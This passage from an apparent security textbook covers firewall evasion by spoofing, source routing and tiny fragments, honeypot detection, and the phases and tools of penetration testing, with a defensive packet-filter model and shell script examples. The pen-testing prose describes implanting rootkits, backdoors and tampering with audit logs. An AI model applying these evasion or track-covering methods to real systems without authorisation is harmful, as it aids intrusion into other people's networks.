ii. IP Address Spoofing: IP address spoofing is one effective method of bypassing a firewall. The attacker gains unauthorized access to a computer or a network by making it appear that a message comes from a trusted machine, by "spoofing" the IP address of that machine. To understand completely how it works, we should review the structure of the TCP/IP protocol suite; a basic understanding of its headers and network exchanges is essential to the whole process. The Internet Protocol (IP), which is used to route data packets on a network, is a network protocol operating at the network layer of the OSI model. It is connectionless and carries no information regarding transaction state.
iii. Source Routing: Source routing is another method of bypassing a firewall: the sender of a packet designates the route that the packet should take through the network. Normally, as packets travel among the nodes in the network, each router checks the destination IP address in the packet and chooses the next node to forward it to. With source routing, the sender makes some or all of these decisions instead of the routers.
iv. Tiny Fragments: Tiny fragments are another effective method of bypassing a firewall. Here the attacker uses IP fragmentation to create extremely small fragments and force the TCP header information into separate packet fragments. This is designed to bypass filtering rules that depend on TCP header information. The attacker hopes that only the first fragment is examined by the filtering router and the remaining fragments are passed through.
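The following added example (not code from the book) models a stateful packet filter of the kind described under Classification of Firewalls and shows the checks that defeat the four evasion techniques just listed; the internal address range, the ports and the packets are constructed.

```python
"""Model of a stateful packet filter on an Internet-facing interface,
showing the checks that defeat the four evasion techniques listed above.
Addresses, ports and packets are constructed for the demo."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL_NET = ip_network("192.168.1.0/24")    # constructed internal range
TCP_HEADER_LEN = 20                              # minimum TCP header size


@dataclass
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset             # TCP flags, e.g. frozenset({"SYN"})
    direction: str               # "in" = arrives from the Internet, "out" = leaves
    frag_offset: int = 0         # IP fragment offset; 0 = first or only fragment
    more_fragments: bool = False
    payload_len: int = 0         # bytes of IP payload carried in this fragment
    source_routed: bool = False  # IP LSRR/SSRR option present


class StatefulFirewall:
    def __init__(self, allowed_outbound_ports=(53, 80, 443)):
        self.allowed_outbound = set(allowed_outbound_ports)
        # (inside_ip, inside_port, remote_ip, remote_port) of connections the
        # inside opened; only traffic belonging to them may come back in.
        self.connections = set()
        self.log = []

    def _drop(self, pkt, reason):
        self.log.append(f"DROP {pkt.src}:{pkt.sport}->{pkt.dst}:{pkt.dport} {reason}")
        return False

    def _known_peer(self, pkt):
        inside, remote = (pkt.dst, pkt.src) if pkt.direction == "in" else (pkt.src, pkt.dst)
        return any(c[0] == inside and c[2] == remote for c in self.connections)

    def filter(self, pkt):
        """Return True to forward the packet, False to drop it."""
        # Source routing lets the sender dictate the path; never honour it.
        if pkt.source_routed:
            return self._drop(pkt, "source-routed option")
        # Anti-spoofing: an internal source address cannot arrive from the Internet.
        if pkt.direction == "in" and ip_address(pkt.src) in INTERNAL_NET:
            return self._drop(pkt, "spoofed internal source")
        # Tiny fragments: the first fragment must carry the whole TCP header,
        # otherwise the port and flag checks below never get to see it.
        if (pkt.frag_offset == 0 and pkt.more_fragments
                and pkt.payload_len < TCP_HEADER_LEN):
            return self._drop(pkt, "tiny first fragment")
        # Later fragments carry no TCP header; admit them only for a peer that
        # already has an inside-initiated connection.
        if pkt.frag_offset > 0:
            return True if self._known_peer(pkt) else self._drop(pkt, "orphan fragment")
        if pkt.direction == "out":
            if pkt.dport not in self.allowed_outbound:
                return self._drop(pkt, "outbound port not allowed")
            if "SYN" in pkt.flags:           # inside host opens a connection
                self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return True
        # Inbound: only traffic of a connection the inside opened. A stateless
        # filter that merely blocks inbound SYNs would pass a lone FIN segment.
        if (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.connections:
            return True
        probe = " (FIN probe)" if pkt.flags == frozenset({"FIN"}) else ""
        return self._drop(pkt, "no matching connection state" + probe)


def run_demo():
    """Constructed exchange; returns ({scenario: forwarded?}, firewall)."""
    fw = StatefulFirewall()
    syn, fin, ack = frozenset({"SYN"}), frozenset({"FIN"}), frozenset({"ACK"})
    inside, server, stranger = "192.168.1.10", "203.0.113.5", "198.51.100.7"
    results = {
        # Inside host opens HTTPS; the server's reply matches the new state.
        "outbound_syn": fw.filter(Packet(inside, server, 51000, 443, syn, "out")),
        "reply_to_it": fw.filter(Packet(server, inside, 443, 51000, syn | ack, "in")),
        # FIN scan probe: nobody inside opened this connection.
        "fin_probe": fw.filter(Packet(stranger, inside, 40000, 22, fin, "in")),
        # Internal source address arriving on the outside interface.
        "spoofed_src": fw.filter(Packet("192.168.1.50", inside, 40001, 22, syn, "in")),
        "source_routed": fw.filter(Packet(stranger, inside, 40002, 443, ack, "in",
                                          source_routed=True)),
        # An 8-byte first fragment cannot hold a 20-byte TCP header.
        "tiny_fragment": fw.filter(Packet(stranger, inside, 40003, 22, syn, "in",
                                          more_fragments=True, payload_len=8)),
        # A continuation fragment of the HTTPS reply is admitted; one from a
        # stranger with no connection behind it is not.
        "fragment_known": fw.filter(Packet(server, inside, 0, 0, frozenset(), "in",
                                           frag_offset=185, payload_len=500)),
        "fragment_orphan": fw.filter(Packet(stranger, inside, 0, 0, frozenset(), "in",
                                            frag_offset=185, payload_len=500)),
    }
    return results, fw
```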
14.5 Honeypot
A honeypot is a computer system on the Internet that is expressly set up
to attract and "trap" people who attempt to attack other people's
computer systems.
Honeypots are designed to mimic systems that an intruder would like to break into, but limit the intruder's access to the rest of the network. If a honeypot is successful, the intruder will have no idea that he or she is being tricked and monitored.
Most honeypots are installed inside firewalls so that they can be better controlled, though it is possible to install them outside of firewalls. A firewall in a honeypot works in the opposite way to a normal firewall: instead of restricting what comes into a system from the Internet, the honeypot firewall allows all traffic to come in from the Internet and restricts what the system sends back out.
A honeypot consists of a single computer that appears to be part of a network but is actually isolated and protected. A honeypot can also consist of more than one computer; this is called a honeynet.
By luring a hacker into a system, a honeypot serves several purposes:
The administrator can watch the hacker exploit the vulnerabilities of the system, thereby learning where the system has weaknesses that need to be redesigned.
The hacker can be caught and stopped while trying to obtain root access to the system.
By studying the activities of hackers, designers can better create more secure systems that are potentially invulnerable to future hacks.101
101 http://www.webopedia.com/TERM/H/honeypot.html
Although most honeypots have a similar general purpose, there are actually different types of honeypots that fulfill different functions.103 The types of honeypots are as follows:
Low Interaction Honeypots
Low interaction honeypots allow only limited interaction for an attacker or malware. All services offered by a low interaction honeypot are emulated. Thus low interaction honeypots are not themselves vulnerable and will not become infected by an exploit attempted against the emulated vulnerability.
Examples: Specter, Honeyd and KFSensor.
High Interaction Honeypots
High interaction honeypots make use of the actual vulnerable service or software. They are usually complex solutions, as they involve real operating systems and applications: nothing is emulated, everything is real. High interaction honeypots provide a far more detailed picture of how an attack or intrusion progresses or how a particular piece of malware executes in real time. Since there is no emulated service, they also help in identifying unknown vulnerabilities. But high interaction honeypots are more prone to infection, and they increase risk because attackers can use these real honeypot operating systems to attack and compromise production systems.
Examples: Symantec Decoy Server and honeynets.104
Detecting Honeypots:
Attackers can determine the presence of honeypots by probing the services running on the system. Attackers craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMTPS) and IMAP over SSL (IMAPS). Ports that show a particular service running but deny a three-way handshake connection indicate the presence of a honeypot. Some of the tools that can be used to probe honeypots include:
Send-Safe Honeypot: a tool designed for checking lists of HTTPS and SOCKS proxies for so-called honeypots.
Nessus Security Scanner: the Nessus Security Scanner has the ability to test SSLized services such as HTTPS, SMTPS and more. Nessus can be provided with a certificate so that it can be integrated into a PKI-fied environment.
103 http://ethics.csc.ncsu.edu/abuse/hacking/honeypots/study.php
104 http://www.omnisecu.com/security/infrastructure-and-email-security/low-interaction-honeypots-and-high-interaction-honeypots.htm
14.6 Countermeasures:
Countermeasures for corporate end-users or home PC users:
The desktop anti-virus (AV) signatures must be kept up to date.
Don't open attachments unless you are sure of their authenticity.
Make sure the system is updated with the latest security patches.
If possible, install a desktop-based firewall.
Always run a virus scan on any external drive when it is attached to the system.
Never download free tools if you are not sure of their authenticity.
Always stay tuned to the latest virus alerts and outbreaks.
Countermeasures for corporate security administrators:
The AV gateway must have all signatures up to date so that they can be pushed to its client PCs.
A content filter at the SMTP gateway is always advisable.
Desktops attached to the corporate network must have the latest security patches installed.
There must be a patch management system (such as SMS or SUS) in place, and the systems must be updated with the latest security patches.
Conduct scheduled anti-virus scans on all desktops attached to the corporate network.
An IDS, if installed, is a great device for keeping you alerted about any attacks on the network, but it is even more helpful if an IPS can be afforded.
Big organizations that have a huge number of network devices and servers to manage should use Security Information Management (SIM) systems such as NetIQ, ArcSight or NetForensics. This makes it easier for a security administrator to monitor huge networks for any kind of security alert.
Security should not be confined to the perimeter level; it should also be taken seriously at the level of the desktops attached to the corporate network.
Conduct end-user training to make users aware of the various risks related to virus or worm attacks.
Last but not least, always stay tuned to the latest virus alerts and outbreaks.
CHAPTER 15
Penetration Testing
15.1 Introduction to Penetration Testing
15.2 Security Assessments
15.3 Types of Penetration Testing
15.4 Penetration Testing Techniques
15.5 Penetration Testing Phases
15.6 List the Automated Penetration Testing Tools
15.1 Introduction
A penetration test is a proactive and authorized attempt to evaluate the
security of an IT infrastructure by safely attempting to exploit system
vulnerabilities, including OS, service and application flaws, improper
configurations, and even risky end-user behavior. Such assessments are
also useful in validating the efficacy of defensive mechanisms, as well as
end-users’ adherence to security policies.
Tests are typically performed using manual or automated technologies to
systematically compromise servers, endpoints, web applications, wireless
networks, network devices, mobile devices and other potential points of
exposure.
Information about any security vulnerabilities successfully exploited
through penetration testing is typically aggregated and presented to IT
and network systems managers to help those professionals make
strategic conclusions and prioritize related remediation efforts. The
fundamental purpose of penetration testing is to measure the feasibility
of systems or end-user compromise and evaluate any related
consequences such incidents may have on the involved resources or
operations.106
15.2 Security Assessments
Every organization uses different types of security assessments to validate the level of security of its network resources.
Security assessments are categorized according to their function as follows:
A) Penetration Testing
B) Security Audits
C) Vulnerability Assessment
A Penetration tester assesses the security posture of the organization
as a whole to reveal the potential consequences of a real attacker
compromising a network or application. Security assessments can be
categorized as security audits, vulnerability assessments, or penetration
testing. Each security assessment requires that the people conducting
the assessment have different skills based on the scope of the
assessment.
A security audit and a vulnerability assessment scan IP networks and hosts for known security weaknesses with tools designed to locate live systems, enumerate users, and identify operating systems and applications, looking for common security configuration mistakes and vulnerabilities.
A vulnerability assessment only identifies potential vulnerabilities, while a pen test actually tries to gain access to the network. An example of a security assessment is looking at a door and thinking that if that door is unlocked it could allow someone to gain unauthorized access, whereas a pen test actually tries to open the door to see where it leads.
106 http://www.coresecurity.com/content/what-is-pen-test
Penetration testing, also called pen testing, is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.
A pen test is usually a better indication of the weaknesses of the network or systems, but it is more invasive and therefore has more potential to cause disruption to network service.
Difference between a network vulnerability assessment and a penetration test107
Vulnerability Analysis is the process of identifying vulnerabilities
on a network, whereas a Penetration Testing is focused on actually
gaining unauthorized access to the tested systems and using that
access to the network or data, as directed by the client.
A Vulnerability Analysis provides an overview of the flaws that exist on the system, while a Penetration Testing goes on to provide an impact analysis of the flaws, identifying the possible impact of each flaw on the underlying network, operating system, database, etc.
Vulnerability Analysis is more of a passive process. In Vulnerability
Analysis you use software tools that analyze both network traffic
and systems to identify any exposures that increase vulnerability
to attacks. Penetration Testing is an active practice wherein ethical
hackers are employed to simulate an attack and test the network
and systems’ resistance.
Vulnerability Analysis deals with potential risks, whereas
Penetration Testing is actual proof of concept. Vulnerability
Analysis is just a process of identifying and quantifying the
security Vulnerabilities in a system. Vulnerability Analysis doesn’t
provide validation of Security Vulnerabilities. Validation can be
only done by Penetration testing.
107 http://www.ivizsecurity.com/blog/penetration-testing/
The scope of a Penetration Testing can vary from a Vulnerability
Analysis to fully exploiting the targets to destructive testing.
Penetration Testing includes a Vulnerability Analysis, but it goes one step further: you evaluate the security of the system by simulating an attack of the kind a malicious hacker would carry out.
For instance a Vulnerability Analysis exercise might identify
absence of anti-virus software on the system or open ports as a
vulnerability. The Penetration Testing will determine the level to
which existing vulnerabilities can be exploited and the damage that
can be inflicted due to this.
A Vulnerability Analysis answers the question: “What are the
present Vulnerabilities and how do we fix them?” A Penetration
Testing simply answers the questions: “Can any External Attacker
or Internal Intruder break-in and what can they attain?”
Penetration Testing
A penetration test simulates methods that intruders use to gain
unauthorized access to an organization’s network and systems and to
compromise them. The purpose of a penetration test is to test the
security implementations and security policy of an organization: basically
to see if the organization has implemented security measures as specified
in the security policy.
A hacker whose intent is to gain unauthorized access to an
organization’s network is very different from a professional penetration
tester who lacks malice and intent and uses their skills to improve an
organization’s network security without causing a loss of service or a
disruption to the business.
Pen tests can be automated with software applications or they can be
performed manually. Either way, the process includes gathering
information about the target before the test (reconnaissance), identifying
possible entry points, attempting to break in (either virtually or for real)
and reporting back the findings.
The main objective of penetration testing is to determine security
weaknesses. A pen test can also be used to test an organization's
security policy compliance, its employees' security awareness and the
organization's ability to identify and respond to security incidents.
Why conduct a penetration test?
From a business perspective, penetration testing helps safeguard your
organization against failure, through:
• Preventing financial loss through fraud (hackers, extortionists and disgruntled employees) or through lost revenue due to unreliable business systems and processes.
• Proving due diligence and compliance to your industry regulators, customers and shareholders. Non-compliance can result in your organization losing business, receiving heavy fines, gathering bad PR or ultimately failing. At a personal level it can also mean the loss of your job, prosecution and sometimes even imprisonment.
• Protecting your brand by avoiding loss of consumer confidence and business reputation.
• Identifying vulnerabilities and quantifying their impact and likelihood so that they can be managed proactively; budget can be allocated and corrective measures implemented.
15.3 Types of Penetration Testing
There are two types of penetration test:
1. Internal: This testing is often performed from different network access points that include both the physical and logical segments; this provides a more detailed view of the security.
2. External: This testing focuses on the infrastructure components, servers, and the related software of the target. It also provides a detailed analysis of the information that is available from public sources, such as the Internet. Enumeration of the network is also performed and analyzed. The filtering devices, such as firewalls and routers, are also scrutinized for their vulnerabilities. Finally, the impact and consequences are assessed.
The two types of penetration have three variations, each depending on
the degree of knowledge provided by the target company to the pen
testing team.
• Black box: This testing does not provide the tester with any
information and therefore is a much better testing method because
crackers and script kiddies normally do not have any information that
is directly obtained from the target company and need to gather their
information from public sources. It simulates real-world attack
scenarios. The steps of mapping the network, enumerating shares and
services, and operating system fingerprinting are typical for black box
testing.
• White box: In this testing, the relevant information is provided to the testers so that they can assess the security against specific attacks or specific targets. This is the chosen method when the company needs to get a complete audit of its security.
• Grey box: In this testing, some knowledge is provided to the testers
but this testing puts the tester in a privileged position. This would
normally be a preferred method when cost is a factor as it saves time for
the pen testing team to uncover information that is publicly available.
Also, this approach would be suitable when the organization needs to
obtain knowledge of the security assessment practices.108
Methods of Penetration
You have two choices when it comes to getting a penetration test done.
• Automatic: The automatic penetration is often chosen when cost is a
key factor. Due to the free software availability of many penetration
tools, a company could choose to have the penetration performed by
this method. Also, commercial tools that could be used have a cost
associated with them; however, this tool cost could be spread out and
would still be a less costly solution than manual penetration.
However, the learning curve for each penetration tool is usually much
higher, and the knowledge required and experience in doing such work
demands the skills of an expert.
• Manual: Manual penetration is usually chosen to give an independent
assessment of the penetration. Normally an external company that is
experienced in the field and does it on a regular basis, with a good track
record, is chosen. Regulation requirements could make this the only
alternative a company has.
108 http://www.giac.org/cissp-papers/197.pdf
15.4 Penetration Testing Techniques
Network services test: This is one of the most common types of
penetration tests, and involves finding target systems on the network,
searching for openings in their base operating systems and available
network services, and then exploiting them remotely. Some of these
network service penetration tests take place remotely across the Internet,
targeting the organization’s perimeter networks. Others are launched
locally, from the target’s own business facilities, to assess the security of
their internal network or the DMZ from within, seeing what kinds of
vulnerabilities an internal user could learn.
Client-side test: This kind of penetration test is intended to find
vulnerabilities in and exploit client-side software, such as web browsers,
media players, document editing programs, etc.
Web application test: These penetration tests look for security
vulnerabilities in the web-based applications and programs deployed and
installed on the target environment.
Remote dial-up war dial: These penetration tests look for modems in a
target environment, and normally involve password guessing or brute
forcing to login to systems connected to discovered modems.
Wireless security test: These penetration tests involve discovering a
target’s physical environment to find unauthorized wireless access points
or authorized wireless access points with security weaknesses.
Social engineering test: This type of penetration test involves attempting to trick a user into revealing sensitive information such as a password or any other sensitive data. These tests are often conducted over the phone, targeting selected help desks, users or employees, and evaluate processes, procedures, and user awareness.
15.5 Penetration Testing Phases
Penetration testing includes three phases:109
1. PRE-ATTACK PHASE
2. ATTACK PHASE
3. POST-ATTACK PHASE
1. Pre-Attack Phase
The pre-attack phase involves reconnaissance or data gathering. It consists of two sub-phases: passive and active reconnaissance.
PASSIVE RECONNAISSANCE:
This phase provides all the footprinting information, such as physical and logical locations, analog connections, and company contact information.
It consists of the following activities: directory mapping (web, ftp),
competitive intelligence gathering, asset classification (determining
asset value of infrastructure that is interfacing with the web),
obtaining registration information, product/services offered (finding
out the product ranges and services offered by the target company that
are available online), document sifting (the gathering of information
only from published material), and social engineering.
The pen test involves locating the IP block and using domain name
‘Whois’ to find personnel contact information, as well as enumerating
information about hosts that can then be used to create a detailed
network diagram and identify targets.
ACTIVE RECONNAISSANCE:
This phase attempts to profile and map the Internet profile of the
organization. A few of the activities involved are network mapping,
perimeter mapping, web profiling, operating system and service
identification obtained through OS fingerprinting and port scans.
109 http://www.giac.org/cissp-papers
2. Attack Phase
Next is the attack phase, and during the attack phase tools can range
from exploitive to responsive. They’re used by professional hackers to
monitor and test the security of systems and the network. These
activities include but aren’t limited to:
i. Penetrating the perimeter
This includes looking at error reports, checking Access Control
Lists by forging responses with crafted packets, and evaluating
protocol filtering rules by using various protocols such as SSH,
FTP, and Telnet. The tester should also test for buffer overflows,
SQL injections, bad input validation, output sanitization, and DoS
attacks. In addition to software testing, you should allocate time to
test internal web applications and wireless configurations, because
the insider threat is the greatest security threat today.
ii. Acquiring the target
This set of activities is more intrusive and challenging than a
vulnerability scan or audit. You can use an automated exploit tool
like CORE IMPACT or attempt to access the system through
legitimate information obtained from social engineering. This
activity also includes testing the enforcement of the security policy,
brute-force password crackers, or the use of get admin tools to
gain greater access to protected resources.
iii. Escalating privileges
Once a user account has been acquired, the tester can attempt to give the user account more privileges or rights to systems on the network. Many hacking tools are able to exploit a vulnerability in a system and create a new user account with administrator privileges.
iv. Gaining access
It is at this stage that the penetration tester exploits the vulnerability by executing the code of choice, such as getting a command shell. After access is gained, it is common to upload root kits or implant programs that provide backdoor access. Having the target connect to the attacker's machine is often a desired solution by attackers. Following this, the attacker needs to cover his tracks by manipulating the audit logs. The main goal here is to explore the extent to which security defenses fail.
v. Executing, implanting, and retracting
This is the final phase of testing. Your hacking skills are
challenged by escalating privileges on a system or network while
not disrupting business processes. Leaving a mark can show where
you were able to gain greater access to protected resources. Many
companies don’t want you to leave marks or execute arbitrary
code, and such limitations are identified and agreed upon prior to
starting your test.
3. Post-Attack Phase
The post-attack phase involves restoring the system to normal pre-test
configurations, which includes removing files, cleaning registry entries if
vulnerabilities were created, and removing shares and connections.
Finally, you analyze all the results and present them in a comprehensive report and a report for management. These reports include your objectives, your observations, all activities undertaken, and the results of test activities, and may recommend fixes for vulnerabilities.
Penetration Testing Deliverables: These include a detailed report of all incidents that occurred, and all activities carried out, during the testing. A description of the observations during testing is provided, as are the objectives and the recommended corrective measures, as agreed upon in the rules of engagement.
Pen-Test Report
The main deliverable at the end of a penetration test is the pen testing
report. The report should include the following:
• List of your findings, in order of highest risk
• Analysis of your findings
• Conclusion or explanation of your findings
• Remediation measures for your findings
• Log files from tools that provide supporting evidence of your findings
• Executive summary of the organization's security posture
• Name of the tester and the date testing occurred
• Any positive findings or good security implementations
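As an added illustration of the first item in the list above (example code written for this chapter, not from the book or from any tool it names), the following POSIX shell script orders a set of findings so that the highest-risk items appear first in the report. The findings, the severity names and the rank mapping are constructed for the example; a real report would use the severity scale agreed in the rules of engagement.

```shell
#!/bin/sh
# Added example (not from the book): order pen-test findings by risk so the
# highest-risk items come first. Severity names and the rank mapping below
# are this example's own convention; the findings are constructed data.

# severity_rank NAME -> prints a number, lower = higher risk, so that
# `sort -n` puts Critical first. Unknown severities sort last.
severity_rank() {
    case "$1" in
        Critical) echo 0 ;;
        High)     echo 1 ;;
        Medium)   echo 2 ;;
        Low)      echo 3 ;;
        Info)     echo 4 ;;
        *)        echo 9 ;;
    esac
}

# order_findings reads lines of the form "severity|title|affected host" on
# stdin and prints them highest risk first, numbered from 1. Findings with
# the same severity keep their input order (stable sort).
order_findings() {
    while IFS='|' read -r sev title host; do
        printf '%s\t%s|%s|%s\n' "$(severity_rank "$sev")" "$sev" "$title" "$host"
    done | sort -n -s | cut -f2- | awk '{ printf "%d. %s\n", NR, $0 }'
}

# Constructed sample findings (not from any real assessment).
SAMPLE_FINDINGS='Low|Verbose server banner|web01
Critical|Unauthenticated admin interface|app02
Medium|Missing HttpOnly flag on session cookie|web01
High|Outdated TLS configuration|vpn01'

# demo prints the sample findings in report order.
demo() {
    printf '%s\n' "$SAMPLE_FINDINGS" | order_findings
}

demo
```

The rank is prepended as a sort key and stripped again with cut, so the report lines themselves stay in the simple "severity|title|host" form that can be pasted into the findings section.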
Validation of Penetration: This is the final step after penetration testing
is accomplished. You now have a documented report with the actual
validation of each asset value that would be lost in regards to a breach of
your security defenses. The validation report also defines to what degree
the penetration was successful, and unsuccessful. Recommendations are
provided to secure those components that did not pass the test or meet
to a certain degree, as required by regulations or security policy.
Validation establishes the worth of penetration testing for its defensive measures in the entire environment. It is an independent evaluation of the results obtained from the penetration testing to ensure that the results are conclusive. Recommendations that need to be implemented are also in this report. A gap analysis is now performed that shows the difference between where the organization is today and where it would like to be.110
110 http://www.giac.org/cissp-papers
15.6 Automated Penetration Testing Tools
i. Nessus
This freeware network vulnerability scanner has more than 11,000
plug-ins available. It includes remote and local security checks,
client/server architecture with a GTK graphical interface, and an
embedded scripting language for writing your own plug-ins or
understanding the existing ones.
ii. GFI LANguard
This is a commercial network security scanner for Windows. It
scans IP networks to detect what machines are running. It can
determine the host operating system, what applications are
running, what Windows service packs are installed, whether any
security patches are missing, and more.
iii. Retina
This is a commercial vulnerability assessment scanner by eEye.
Like Nessus, Retina scans all the hosts on a network and reports
on any vulnerability found.
iv. CORE IMPACT
CORE IMPACT is an automated pen testing product that is widely
considered to be the most powerful exploitation tool available. It
has a large, regularly updated database of professional exploits.
Among its features, it can exploit one machine and then establish
an encrypted tunnel through that machine to reach and exploit
other machines.
v. ISS Internet Scanner
This is an application-level vulnerability assessment. Internet
Scanner can identify more than 1,300 types of networked devices
on your network, including desktops, servers, routers/switches,
firewalls, security devices, and application routers.
vi. X-Scan
X-Scan is a general multithreaded plug-in-supported network
vulnerability scanner. It can detect service types, remote operating
system types and versions, and weak usernames and passwords.
vii. SARA
Security Auditor’s Research Assistant (SARA) is a vulnerability
assessment tool derived from the System Administrator Tool for
Analyzing Networks (SATAN) scanner. Updates are typically
released twice a month.
viii. QualysGuard
This is a web-based vulnerability scanner. Users can securely access QualysGuard through an easy-to-use web interface. It features more than 5,000 vulnerability checks, as well as an inference-based scanning engine.
ix. SAINT
Security Administrator’s Integrated Network Tool (SAINT) is a
commercial vulnerability assessment tool.
x. MBSA
Microsoft Baseline Security Analyzer (MBSA) is built on the Windows Update Agent and Microsoft Update infrastructure. It ensures consistency with other Microsoft products and, on average, scans more than 3 million computers each week.
xi. Metasploit Framework
This is an open-source software product used to develop, test, and
use exploit code.
xii. Canvas
Canvas is a commercial vulnerability exploitation tool. It includes more than 150 exploits.
CHAPTER 16
Shell Scripting
Objective
16.1 Introduction
16.2 Shell Introduction
16.3 Scripting Introduction
16.4 Shell Scripting
16.5 Importance of Shell Script
16.6 Capabilities of Shell Script
16.7 Shell Script Example
16.1 Introduction
Time is precious. It is a waste of time to type a frequently used sequence of commands at a command prompt, especially if the commands are abnormally long or complex. Scripting addresses this by automating these command sequences, making life at the shell easier and more productive.111
You can think of a scripting platform as an environment in which a
script can run. Given that a script is nothing more than a collection of
text, there has to be some means for the computer on which the script is
running to understand that text and carry out its instructions.
Being a Linux user means you play around with the command line; there are just some things that are done much more easily via this interface than by pointing and clicking. The more you use and learn the command line, the more you see its potential. Well, the command line itself is a program: the shell.
Now, some of you who used Windows before using Linux may remember
batch files. These were little text files that you could fill with commands
to execute and Windows would run them in turn. It was a clever and
neat way to get some things done, like run games in your high school
computer lab when you couldn’t open system folders or create shortcuts.
111 http://www.csie.ntu.edu.tw/~r92092/ref/win32/win32scripting.html#Win32Scripting-Introduction
Batch files in Windows, while useful, are a cheap imitation of shell
scripts.112
16.2 What is Shell?
In computing, a shell is a piece of software that essentially provides a
kind of interface for end-users. Typically, the term refers to an operating
system shell which provides access to the services of a kernel. However,
the term is also applied very loosely to applications and may include any
software that is "built around" a particular component, such as web
browsers and email clients that are "shells" for HTML rendering engines.
The name 'shell' originates from shells being an outer layer of interface
between the user and the innards of the operating system (the kernel).
Operating system shells generally fall into one of two categories:
command line and graphical. Command line shells provide a command
line interface (CLI) to the operating system, while graphical shells provide
a graphical user interface (GUI).
A shell is a place where you can write commands to be executed. If you are running a Windows OS, a shell is like the command prompt (Start/All Programs/Accessories/Command Prompt). On a shell you can see your files with the command "ls" (short for "list"), you can change directory with the command "cd" (short for "change directory"), etc.113
16.3 What is Scripting?
Simply stated, a script is a small, interpreted program that can carry out
a series of tasks and make decisions based on specific conditions it finds.
By “interpreted,” we mean that when it is run, it is carried out one line at
a time, as opposed to “compiled,” which is the process of turning it into
machine language before it is run. A script is created using ASCII text, so
Windows Notepad or a similar text editor is the only tool required.
A number of scripting "languages" are available for users to choose from, each with its own capabilities and limitations. These languages include Windows native shell scripting, Visual Basic Scripting Edition, JavaScript, Kixtart, and Perl. Which one a user chooses will ultimately depend on a combination of the tasks required and the user's own experience and inclinations.
112 http://www.howtogeek.com/67469/the-beginners-guide-to-shell-scripting-the-basics/
113 http://wiki.dreamhost.com/Shell
Each scripting language has a collection of commands or keywords and a
set of rules on how to use them. The set of rules for writing a script in
any given language is called the syntax. Once you learn the keywords
and syntax, you can use a text editor to write the script and then save it
with a file extension that is appropriate to the scripting language you are
using. Some of the more common file extensions you will see are .bat,
.cmd, .vbs, .js, and .kix.114
16.4 Shell Scripting
Shell scripts allow us to program commands in chains and have the system execute them as a scripted event, just like batch files. They also allow for far more useful functions, such as command substitution. You can invoke a command, like date, and use its output as part of a file-naming scheme. You can automate backups, and each copied file can have the current date appended to the end of its name. Scripts aren't just invocations of commands, either. They are programs in their own right. Scripting allows you to use programming functions, such as 'for' loops, if/then/else statements, and so forth, directly within your operating system's interface. And you don't have to learn another language, because you're using what you already know: the command line.
This is the best advantage of scripting. You get to program with
commands you already know, while learning staples of most major
programming languages. Need to do something repetitive and tedious?
Script it! Need a shortcut for a really convoluted command? Script it!
Want to build a really easy to use command-line interface for something?
Script it!115
A shell is nothing more than an interface that allows a user to
communicate with, or issue commands directly to, the operating system.
The concept of a shell has been around in UNIX for many years. In fact,
there are several shells in the UNIX world, each with its own features and
commands that make it suitable for various tasks.
114 http://www.techrepublic.com/article/understand-the-role-of-scripting-in-network-administration/1058081
115 http://www.howtogeek.com/67469/the-beginners-guide-to-shell-scripting-the-basics/
In Windows, there is no such diversity. You have only one shell, the
Windows shell, which is built into the operating system. And you are
undoubtedly already familiar with the interface, although you probably
call it the command prompt or, if you’re a real old-timer, perhaps the
DOS prompt. Technically speaking, it’s called a command shell and is
run by executing the file Cmd.exe, found in C:\Winnt\System32.
Probably the easiest way to run it is to simply click Start | Run,
type cmd in the text box, and click OK, or create a shortcut to Cmd.exe.
The Windows shell comes with a set of built-in commands, many of
which are well known and commonly used, such as dir, copy, del, cd,
etc. Commands and their associated parameters are usually issued one
at a time at the command line. More important for our purposes is the
fact that commands can also be used in a batch mode. That is, using a
text editor, you can write a separate command on each line, saving the
finished product with the extension of either .bat or .cmd. This turns the
text file into an executable that will be run as an interpreted program,
carrying out each command one line at a time, in order. This is what we
call shell scripting.116
16.5 Why Use a Shell Script?
The advantage to scripting languages is that they often work at a higher
level than compiled languages, being able to deal more easily with objects
such as files and directories. The disadvantage is that they are often less
efficient than compiled languages. Usually the trade off is worthwhile; it
can take an hour to write a simple script that would take two days to
code in C or C++, and usually the script will run fast enough that
performance won't be a problem. Examples of scripting languages
include awk, Perl, Python, Ruby, and the shell.
Because the shell is universal among UNIX systems, and because the
language is standardized by POSIX, shell scripts can be written once
and, if written carefully, used across a range of systems. Thus, the
reasons to use a shell script are:
116 http://www.techrepublic.com/article/how-to-use-windows-shell-and-the-windows-scripting-host-functions/1058177
Simplicity:
The shell is a high-level language; you can express complex
operations clearly and simply using it.
Portability:
By using just POSIX-specified features, you have a good chance of
being able to move your script, unchanged, to different kinds of
systems.
Ease of development:
You can often write a powerful, useful script in little time.
16.6 Capabilities of Shell Scripting
Shortcuts
In their most basic form, a shell script can provide a convenient
variation of a system command where special environment
settings, command options, or post processing is applied
automatically, but in a way that allows the new script to still act as
a fully normal UNIX command.
Batch jobs
Shell scripts allow several commands that would be entered
manually at a command line interface to be executed
automatically, and without having to wait for a user to trigger each
stage of the sequence.
Generalization
Simple batch jobs are not unusual for isolated tasks, but using
shell loops, tests, and variables provides much more flexibility to
users.
Verisimilitude
A key feature of shell scripts is that the invocation of their interpreters is handled as a core operating system feature. So rather than a user's shell only being able to execute scripts in that shell's language, or a script only having its interpreter directive handled correctly if it was run from a shell, shell scripts are set up and executed by the OS itself.
Programming
Many modern shells also supply various features usually found
only in more sophisticated general-purpose programming
languages, such as control-flow constructs, variables, comments,
arrays, subroutines, and so on. With these sorts of features
available, it is possible to write reasonably sophisticated
applications as shell scripts.117
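The following POSIX shell script is an added example (not from the book or from the sources it cites) that ties together the features described in 16.4 and 16.6: command substitution using the output of date to build file names, a for loop, an if/then/else test, and functions that act as shortcuts for a longer command sequence. The function names backup_file and backup_dir, the date format and the sample files are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the book): a small POSIX shell backup script.
# It shows command substitution (the output of `date` becomes part of a
# file name), a for loop over files, an if/then/else test, and functions
# that wrap a command sequence the way a shortcut script does.
# The function names and the date format are this example's own choices.

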